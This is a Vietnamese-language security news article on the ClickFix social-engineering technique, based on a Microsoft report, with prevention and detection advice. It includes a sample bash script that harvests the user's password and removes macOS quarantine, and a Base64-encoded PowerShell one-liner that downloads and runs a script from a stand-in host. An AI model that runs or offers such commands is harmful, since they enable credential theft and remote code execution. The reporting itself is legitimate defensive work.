Microsoft Threat Intelligence đã phát đi cảnh báo về sự gia tăng đáng kể của kỹ thuật kỹ thuật xã hội có tên gọi ClickFix Social Engineering. Đây là một phương pháp tinh vi thao túng người dùng thực thi các lệnh độc hại trên thiết bị của họ, qua đó vượt qua các lớp phòng thủ an ninh mạng tự động truyền thống.

Cơ chế Hoạt động của ClickFix Social Engineering

Quan sát từ đầu năm 2024, chiến thuật ClickFix Social Engineering đã nhắm mục tiêu vào hàng nghìn hệ thống doanh nghiệp và người dùng cuối hàng ngày. Kỹ thuật này khai thác xu hướng của người dùng muốn giải quyết các trục trặc kỹ thuật nhỏ, chẳng hạn như xác minh CAPTCHA giả mạo hoặc các thông báo lỗi.

ClickFix tích hợp với các hình thức tấn công phishing, malvertising và drive-by compromise, thường mạo danh các thương hiệu đáng tin cậy để giảm bớt sự nghi ngờ của nạn nhân.

Chuỗi tấn công điển hình bắt đầu bằng các trang đích lừa đảo, hướng dẫn nạn nhân sao chép và dán các lệnh đã bị che giấu vào hộp thoại Windows Run (Win + R), Windows Terminal hoặc PowerShell. Điều này dẫn đến việc tiêm malware không tập tin vào các binary có sẵn trong hệ thống (LOLBins) như msbuild.exe hoặc regasm.exe.

Theo Microsoft, các payload này thường hoạt động trong bộ nhớ dưới dạng các .NET assemblies hoặc Common Language Runtime (CLR) modules, cho phép chúng duy trì ẩn mình, đánh cắp dữ liệu và di chuyển ngang trong mạng một cách lén lút. Chi tiết phân tích về kỹ thuật này có thể tham khảo từ Microsoft.

Các Payload và Hệ thống Mục tiêu của ClickFix

Hệ thống Windows

ClickFix Social Engineering đã được ghi nhận phân phối nhiều loại payload độc hại trên hệ thống Windows. Các loại payload chính bao gồm:

• Lumma Stealer: Các infostealer chuyên đánh cắp thông tin.
• Remote Access Trojans (RATs): Như Xworm và AsyncRAT, cho phép kẻ tấn công điều khiển từ xa.
• Loaders: Bao gồm Latrodectus, dùng để tải và thực thi các payload khác.
• Rootkits: Dựa trên mã nguồn mở r77 đã được sửa đổi để duy trì quyền kiểm soát và che giấu hoạt động độc hại.

Chiến dịch Lampion Malware

Một trường hợp đáng chú ý liên quan đến ClickFix là chiến dịch malware Lampion, hoạt động từ tháng 5 năm 2025. Chiến dịch này nhắm vào các lĩnh vực như chính phủ và tài chính tại nhiều quốc gia thông qua các email phishing chứa các HTML redirect được nén trong file ZIP, dẫn đến các trang web giả mạo cơ quan thuế.

Quy trình lây nhiễm đa giai đoạn của Lampion bao gồm:

• Tải xuống các VBScripts đã bị che giấu.
• Lập lịch các tác vụ để thực hiện trinh sát và né tránh phần mềm diệt virus.
• Đỉnh điểm là hành vi đánh cắp thông tin đăng nhập ngân hàng, mặc dù một số trường hợp không thành công trong việc phân phối payload cuối cùng do mã bị comment (chú thích).

Hệ thống macOS

Tính linh hoạt của kỹ thuật ClickFix Social Engineering không chỉ giới hạn ở Windows. Kể từ cuối tháng 5 năm 2025, các chiến dịch đã bắt đầu nhắm mục tiêu vào người dùng macOS để triển khai Atomic macOS Stealer (AMOS). Mã độc này thu thập cookie trình duyệt, mật khẩu và ví tiền điện tử.

Trong các kịch bản này, các yếu tố lừa đảo thường mô phỏng các dịch vụ như Spectrum, yêu cầu người dùng chạy các script Bash để chiếm quyền mật khẩu hệ thống thông qua xác thực dscl và bỏ qua tính năng cách ly của macOS bằng các lệnh xattr.

#!/bin/bash

# Yêu cầu mật khẩu hệ thống
read -s -p "Nhập mật khẩu của bạn để tiếp tục: " password

# Xác thực và lấy thông tin nếu cần (ví dụ minh họa)
# echo "$password" | sudo -S dscl . -read /Users/$USER

# Bỏ qua cách ly macOS cho file độc hại (ví dụ)
xattr -d com.apple.quarantine /path/to/malicious_app

Kỹ thuật Né tránh và Kênh Lây nhiễm

Kỹ thuật Né tránh Tấn công Mạng

Các tác nhân đe dọa tăng cường khả năng né tránh bằng nhiều phương pháp khác nhau, nhằm che giấu hoạt động của ClickFix Social Engineering:

• Che giấu JavaScript (JavaScript obfuscation): Làm cho mã nguồn khó đọc và phân tích.
• Tải mã từ xa (Remote code loading): Tải các thành phần độc hại từ các máy chủ khác nhau.
• Kỹ thuật dòng lệnh: Sử dụng mã hóa Base64, nối chuỗi, ký tự thoát và thực thi LOLBin lồng nhau (ví dụ: nhiều lần gọi cmd.exe) để che giấu lệnh.

powershell -enc JABzAHIAYwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0ALwBjAG8AbQBwAHIAbwBtAGkAcwBlAGQAJwA7ACAAaQBlAHgAIABoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AbQBhAGwAdwBhAHIAZQBkAC4AcABzADEAIQA=

Đoạn mã trên là một ví dụ về lệnh PowerShell được mã hóa Base64, thường được sử dụng trong các cuộc tấn công mạng để tải và thực thi mã độc từ xa, làm phức tạp quá trình phân tích và phát hiện.

Kênh Lây nhiễm

Các vector lây nhiễm chính của ClickFix Social Engineering rất đa dạng, bao gồm:

• Phishing: Với các tệp đính kèm HTML hoặc URL được định tuyến qua các hệ thống định hướng lưu lượng truy cập (TDS) như Prometheus.
• Malvertising: Trên các trang web streaming lậu, đổi tên các script HTA thành các tiện ích mở rộng đa phương tiện (ví dụ: .mp3, .mp4) để lừa người dùng thực thi.
• Drive-by compromises: Các trang web WordPress bị xâm nhập mạo danh Cloudflare Turnstile để dụ dỗ người dùng thực hiện các hành động độc hại.

Các Tác nhân Đe dọa và Thị trường Ngầm

Microsoft đã xác định các nhóm tác nhân thuộc chuỗi Storm-series (ví dụ: Storm-1607, Storm-0426) là những kẻ chủ mưu chính đứng sau các chiến dịch ClickFix Social Engineering.

Các nhóm này thường mạo danh các thực thể như Cục An sinh Xã hội Hoa Kỳ (US Social Security Administration) để cài đặt các công cụ như ScreenConnect cho mục đích điều khiển từ xa, cho thấy mức độ tinh vi và tổ chức của các cuộc tấn công này.

Các thị trường ngầm đang rao bán các bộ công cụ ClickFix với giá từ 200–1.500 USD mỗi tháng. Các bộ công cụ này cung cấp các tính năng tùy chỉnh như:

• Các mồi nhử lừa đảo có thể tùy chỉnh.
• Khả năng vượt qua phát hiện môi trường máy ảo (VM detection bypass).
• Né tránh kiểm soát tài khoản người dùng (UAC evasion).

Biện pháp Phòng ngừa và Phát hiện để Đảm bảo An Ninh Mạng

Để chống lại mối đe dọa từ ClickFix Social Engineering, các tổ chức và người dùng cần áp dụng các biện pháp phòng ngừa và phát hiện hiệu quả.

Biện pháp Phòng ngừa

Microsoft khuyến nghị các biện pháp sau để tăng cường an ninh mạng:

• Giáo dục người dùng: Nâng cao nhận thức về các kỹ thuật kỹ thuật xã hội và các dấu hiệu của chúng.
• Kích hoạt các tính năng của Defender XDR: Bao gồm quét AMSI (Antimalware Scan Interface) cho PowerShell và các script HTA để phát hiện mã độc.
• Bảo vệ mạng: Chặn các miền máy chủ điều khiển và ra lệnh (C2 domains) đã biết.
• Thiết lập các quy tắc giảm thiểu bề mặt tấn công (Attack Surface Reduction – ASR): Hạn chế thực thi các script đã bị che giấu hoặc đáng ngờ.

Phát hiện

Các hệ thống bảo mật có thể phát hiện các hoạt động của ClickFix Social Engineering thông qua:

• Microsoft Defender Antivirus: Với các phát hiện như Behavior:Win32/ClickFix.
• Cảnh báo Endpoint: Đối với các mục nhập registry RunMRU đáng ngờ, thường được sử dụng để lưu trữ các lệnh đã thực thi gần đây.